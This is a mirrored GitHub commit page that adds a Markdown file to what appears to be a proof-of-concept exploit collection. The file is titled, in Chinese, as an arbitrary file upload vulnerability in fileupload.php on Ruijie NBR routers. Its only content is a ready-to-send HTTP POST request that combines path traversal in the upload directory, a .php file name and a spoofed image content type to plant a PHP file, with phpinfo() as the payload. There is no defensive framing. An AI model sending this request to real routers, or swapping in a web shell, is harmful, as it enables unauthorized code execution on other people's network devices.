mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create 锐捷 NBR 路由器 fileupload.php 任意文件上传漏洞.md
This commit is contained in:
parent
95aa39046e
commit
c5cf63b74a
11
锐捷 NBR 路由器 fileupload.php 任意文件上传漏洞.md
Normal file
11
锐捷 NBR 路由器 fileupload.php 任意文件上传漏洞.md
Normal file
@ -0,0 +1,11 @@
|
|||||||
|
## 锐捷 NBR 路由器 fileupload.php 任意文件上传漏洞
|
||||||
|
|
||||||
|
```
|
||||||
|
POST /ddi/server/fileupload.php?uploadDir=../../321&name=123.php HTTP/1.1
|
||||||
|
Host:
|
||||||
|
Accept: text/plain, */*; q=0.01
|
||||||
|
Content-Disposition: form-data; name="file"; filename="111.php"
|
||||||
|
Content-Type: image/jpeg
|
||||||
|
|
||||||
|
<?php phpinfo();?>
|
||||||
|
```
|
||||||
Loading…
x
Reference in New Issue
Block a user